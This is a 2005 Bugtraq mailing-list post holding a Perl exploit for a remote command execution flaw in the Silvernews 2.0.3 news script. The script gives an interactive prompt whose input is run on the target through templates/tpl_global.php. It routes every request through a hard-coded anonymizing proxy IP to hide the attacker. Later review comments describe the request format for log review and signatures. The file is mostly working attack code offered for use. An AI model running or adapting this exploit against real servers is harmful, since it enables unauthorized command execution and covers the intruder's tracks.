Message-ID: <20050805171518.12928.qmail@securityfocus.com>
Date: 5 Aug 2005 17:15:18 -0000
From: tsl@...urityfocus.com, "[at]"@securityfocus.com,
hackermail.com@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 remote command execution exploit, proxy server
support!
Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded
sploit:
--------
#!/usr/bin/perl
################TSL###########################################################
#
#
# SilverNews exploit, including a proxy server function
# THROAT SECURITY LABS
#
# vuln: http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################
# Script-wide state shared between the interactive prompt loop and sploit().
# NOTE(review): the script has no `use strict` / `use warnings`; $l and $t are
# assigned without `my`, so they are package globals.

# CRLF, appended to each HTTP line written in sploit() and used there to
# recognise the blank line that separates response headers from the body.
$l="\015\012";
# Flag: set to 1 in sploit() once a bare CRLF line has been read from the
# socket. Nothing in the script sets it back to 0.
$t=0;
# Socket to the relay host; re-created on every sploit() call.
my $sock;
# First command-line argument; interpolated verbatim into the request line.
my $target;
# Second command-line argument; interpolated verbatim into the request path.
my $location;
# Text typed at the prompt; becomes the value of the `command` query parameter.
my $command;
my $proxy;
# Hard-coded relay: sploit() connects to this address on port 80 instead of
# connecting to $target. NOTE(review): the target's access log would then be
# expected to show the relay's address as the client - confirm against logs.
$proxy = "200.186.217.122"; # described by the author as a high-anonymity proxy in Brazil
use IO::Socket;
# sploit(): issue one HTTP GET for templates/tpl_global.php, carrying the
# current $command in the `command` query parameter, through $proxy, and print
# the reply to STDOUT.
#
# Takes no arguments (empty prototype). Reads the file-level $proxy, $target,
# $location, $command and $l; assigns $sock and $t.
# Dies if the TCP connection to $proxy:80 cannot be opened. Terminates the
# whole script with exit status 1 when a response status line carries a code
# other than 200.
#
# What the request looks like on the wire, per the print statements below
# (useful for log review and signatures):
#   - request line "GET <target>/<location>/templates/tpl_global.php?command=<text> HTTP/1.1"
#   - User-Agent fixed to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
#   - "Connection: close"; these three lines are all that is written
sub sploit()
{
# A fresh TCP connection to the relay is opened for every command.
$sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";
# The request line is built by plain string interpolation; nothing in this
# sub validates or encodes $target, $location or $command.
print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
print $sock "Connection: close$l";
# Read the reply one line at a time.
while (<$sock>) {
# An HTTP/1.0-1.2 status line with any code other than 200 ends the script.
if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
print "Error! Got HTTP return code $1. Exciting!\n";
exit 1;
}
# Echo lines only once the header/body separator has been seen. $t is a
# global that is never reset, so from the second call onward the response
# headers are echoed as well.
print if $t==1;
# A line consisting only of CRLF marks the end of the response headers.
$t=1 if /^$l$/;
}
}
# Entry point. Exactly two command-line arguments are required; with any
# other count only the banner and usage text are printed.
if (@ARGV != 2)
{
print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
print "-------------------------------------------------------\n\n";
print "* usage:\t $0 [target] [path] \n";
print "* example:\t $0 www.target.com newssystem \n";
print "----\n\n\n pia s. i love you forever ;)\n\n";
} else {
# Both arguments are stored as given; no validation is applied before they
# are interpolated into the request line in sploit().
$target = $ARGV[0];
$location = $ARGV[1];
print "sending exploit ... please wait\n";
sleep(1);
# Interactive prompt: each non-empty line typed becomes one request.
# The loop has no exit command (the check further down is commented out); it
# ends on interrupt, or when sploit() exits on a non-200 status.
# NOTE(review): at end of input <STDIN> yields undef, which matches /^$/, so
# the loop would keep re-prompting - confirm.
while(1){
print "[sploit\@$target:/$location\] ";
$_=<STDIN>;
# Drop the last character of the input (the trailing newline).
chop;
# Skip empty input.
next if /^$/;
# Replace the first space with %20; no other encoding is applied.
s/ /%20/;
# Disabled exit check left in place by the author:
#if ($command=="exit") {exit} else {sploit()};
$command=$_;
sploit();
}
}
#EOF#